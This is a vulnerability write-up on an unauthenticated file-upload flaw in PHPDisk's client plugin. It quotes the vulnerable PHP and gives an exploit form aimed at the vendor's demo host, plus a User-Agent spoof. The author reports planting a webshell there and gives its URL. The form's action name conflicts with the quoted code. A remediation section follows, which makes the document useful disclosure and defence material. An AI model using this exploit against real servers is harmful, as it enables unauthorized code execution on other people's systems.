No login is needed to get a shell. The upload entry point is plugins/phpdisk_client/client_sub.php. It first checks the User-Agent, includes ../../shortdes/commons.inc.php, and then obtains the username and password from a decrypted string:
@set_time_limit(0);
$agent = $_SERVER['HTTP_USER_AGENT'];
if ($agent != 'phpdisk-client') {
    exit('<a href="http://faq.phpdisk.com/search?w=p403&err=code" target="_blank">[PHPDisk Access Deny] Invalid Entry!</a>');
}
$u_info = trim(gpc('u_info', 'P', ''));
parse_str(pd_encode(base64_decode($u_info), 'decode'));
// checked username and pwd...
/*
$username = trim(gpc('username', 'gp', ''));
$password = trim(gpc('password', 'gp', ''));
*/
$username = is_utf8() ? $username : convert_str('utf-8', 'gbk', $username);
$password = is_utf8() ? $password : convert_str('utf-8', 'gbk', $password);
$userinfo = $db->fetch_one_array("select userid from {$tpf}users where username='$username' and password='$password'");
if (!$userinfo) {
    $str = 'network disk logon error: incorrect user name or password. Please enter it again';
    $str = is_utf8() ? convert_str('utf-8', 'gbk', $str) : $str;
    echo $str;
} else {
    $uid = (int)$userinfo[userid];
}
After obtaining the username and password it queries the database, but when the query fails it only echoes "network disk logon error: the user name or password is incorrect. Please enter it again" and does not exit. So the check is useless: you need neither the encrypted string nor a login. Continuing:
switch ($action) {
    case 'upload_file':
        //write_file(PHPDISK_ROOT.'system/2.txt',var_export($_POST,true));
        //write_file(PHPDISK_ROOT.'system/3.txt',var_export($_FILES,true));
        $file = $_FILES['file1'];
        $file_name = trim(gpc('file_name', 'P', ''));
        $file_do_name = trim(gpc('file_do_name', 'P', ''));
        $file_local_path = trim(gpc('file_local_path', 'P', ''));
        $folder_id = (int)gpc('folder_id', 'P', 0);
        $file_size = (int)gpc('file_size', 'P', 0);
        $file_parts = (int)gpc('file_parts', 'P', 0);
        $tmp_dir = PHPDISK_ROOT.'system/cache/';
        make_dir($tmp_dir);
        $file_local_path = is_utf8() ? convert_str('gbk', 'utf-8', $file_local_path) : $file_local_path;
        $file_do_name = is_utf8() ? convert_str('gbk', 'utf-8', $file_do_name) : $file_do_name;
        $file_name = is_utf8() ? convert_str('gbk', 'utf-8', $file_name) : $file_name;
        if (upload_file($file['tmp_name'], $tmp_dir.$file[name])) {
            //insert db
Once inside the case, upload_file is called with the uploaded file, and $file[name] (the client-supplied original filename) is used directly as the target name with no sanitization. Let's look at upload_file:
function upload_file($source, $target) {
    if (function_exists('move_uploaded_file') && @move_uploaded_file($source, $target)) {
        @chmod($target, 0666);
        return $target;
    } elseif (@copy($source, $target)) {
        @chmod($target, 0666);
        return $target;
    } elseif (@is_readable($source)) {
        if ($fp = @fopen($source, 'rb')) {
            @flock($fp, 2);
            $filedata = @fread($fp, @filesize($source));
            @fclose($fp);
        }
        if ($fp = @fopen($target, 'wb')) {
            @flock($fp, 2);
            @fwrite($fp, $filedata);
            @fclose($fp);
            @chmod($target, 0666);
            return $target;
        } else {
            return false;
        }
    }
}
No verification at all; the file is copied straight to the target path. Although there is an unlink after the case block that deletes the uploaded file, that unlink is never reached because the database query fails. (It should be that; I did not take a closer look. In any case it was not executed, and my shell was not deleted.) Exploitation: create an upload page locally:
<form name="form" method="post" action="http://demo.phpdisk.com/v/plugins/phpdisk_client/client_sub.php?action=file_upload" enctype="multipart/form-data">
<input type="hidden" name="file_name" value="aaa.gif">
<input type="file" name="file1">
<input type="submit" name="Submit" value="Upload">
</form>
Select the shell, submit the upload and capture the request. Change the User-Agent to "phpdisk-client" and send it. The response looks like this: (screenshot not preserved). Then check /system/cache/ to find the shell:
Shell on the official demo site: http://demo.phpdisk.com/v/system/cache/info.php
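For reference, the two root causes above (the login check that falls through instead of exiting, and the client-supplied filename written to a web-reachable directory) can be closed as follows. This is an added example, not PHPDisk's own code; it assumes a PDO handle $pdo and table prefix $tpf, reuses the gpc(), pd_encode() and upload_file() helpers shown above, and the extension whitelist is an illustrative policy.

```php
<?php
// Added example (not PHPDisk's own code). Assumed: $pdo is a PDO handle,
// $tpf is the table prefix, gpc()/pd_encode()/upload_file() are the helpers
// from the original source. ALLOWED_EXT is an illustrative policy.
const ALLOWED_EXT = ['gif', 'jpg', 'jpeg', 'png', 'zip', 'txt'];

// Fix 1: a failed login terminates the request instead of falling through.
function require_client_login(PDO $pdo, string $tpf): int
{
    if (($_SERVER['HTTP_USER_AGENT'] ?? '') !== 'phpdisk-client') {
        http_response_code(403);
        exit('[PHPDisk Access Deny] Invalid Entry!');
    }
    parse_str(pd_encode(base64_decode(trim(gpc('u_info', 'P', ''))), 'decode'), $info);
    // Prepared statement: no string interpolation into SQL.
    $stmt = $pdo->prepare("SELECT userid FROM {$tpf}users WHERE username = ? AND password = ?");
    $stmt->execute([$info['username'] ?? '', $info['password'] ?? '']);
    $uid = $stmt->fetchColumn();
    if ($uid === false) {
        http_response_code(401);
        exit('network disk logon error: incorrect user name or password');
    }
    return (int) $uid;
}

// Fix 2: never reuse the client filename; random name, whitelisted extension.
function safe_upload_target(array $file, string $tmp_dir): ?string
{
    if (!isset($file['tmp_name']) || !is_uploaded_file($file['tmp_name'])) {
        return null;
    }
    $ext = strtolower(pathinfo($file['name'] ?? '', PATHINFO_EXTENSION));
    if (!in_array($ext, ALLOWED_EXT, true)) {
        return null;   // .php, .phtml, etc. are rejected before anything is written
    }
    return rtrim($tmp_dir, '/') . '/' . bin2hex(random_bytes(16)) . '.' . $ext;
}

// Usage inside the 'upload_file' branch.
$uid = require_client_login($pdo, $tpf);
$tmp_dir = PHPDISK_ROOT . 'system/cache/';   // should also be served with PHP execution disabled
$target = safe_upload_target($_FILES['file1'] ?? [], $tmp_dir);
if ($target === null || !upload_file($_FILES['file1']['tmp_name'], $target)) {
    http_response_code(400);
    exit('upload rejected');
}
```

Independently of the code fix, serving system/cache/ with script execution disabled means a file that does slip through is not executable as PHP.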